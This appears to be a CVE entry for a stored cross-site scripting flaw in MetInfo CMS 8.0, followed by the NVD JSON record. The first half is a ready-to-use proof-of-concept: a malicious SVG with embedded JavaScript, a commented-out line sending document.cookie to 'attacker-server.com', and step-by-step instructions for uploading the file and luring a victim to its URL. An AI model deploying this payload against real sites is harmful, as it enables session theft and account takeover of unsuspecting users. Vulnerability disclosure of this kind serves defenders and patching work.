CVE-2025-60451

<!-- CVE-2025-60451 PoC - Stored XSS via Malicious SVG Upload in MetInfo CMS 8.0 --> <!-- Save the following content as 'malicious.svg' and upload via MetInfo CMS webset module --> <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="500" height="500"> <script type="text/javascript"> // PoC for CVE-2025-60451 - Stored XSS in MetInfo CMS 8.0 // This script executes when the SVG file is rendered in a victim's browser // Example 1: Simple alert to demonstrate XSS execution alert('XSS Triggered - CVE-2025-60451'); // Example 2: Cookie exfiltration (for demonstration only) // var cookie = document.cookie; // var img = new Image(); // img.src = 'http://attacker-server.com/steal?cookie=' + encodeURIComponent(cookie); // Example 3: Using onload event as alternative trigger </script> <text x="10" y="50" font-size="20">Malicious SVG - CVE-2025-60451</text> </svg> <!-- Usage: 1. Save as malicious.svg 2. Login to MetInfo CMS 8.0 backend 3. Navigate to Website Settings module (网站设置) 4. Upload the malicious SVG file via the uploadify component 5. Share the URL of the uploaded SVG with victim 6. When victim opens the SVG URL, JavaScript executes in their browser context -->

{"cve": {"id": "CVE-2025-60451", "sourceIdentifier": "[email protected]", "published": "2025-10-03T14:15:46.667", "lastModified": "2025-10-07T15:32:47.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists due to insufficient validation and sanitization of SVG file uploads in the app\\system\\include\\module\\uploadify.class.php component, specifically in the website settings module. This security flaw allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "A86CC57E-FD95-43D3-A9CE-1153FC3C8684"}]}]}], "references": [{"url": "https://snowhy77.github.io/2025/08/22/Stored-XSS-Vulnerability-in-MetInfo-Webset-Module/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}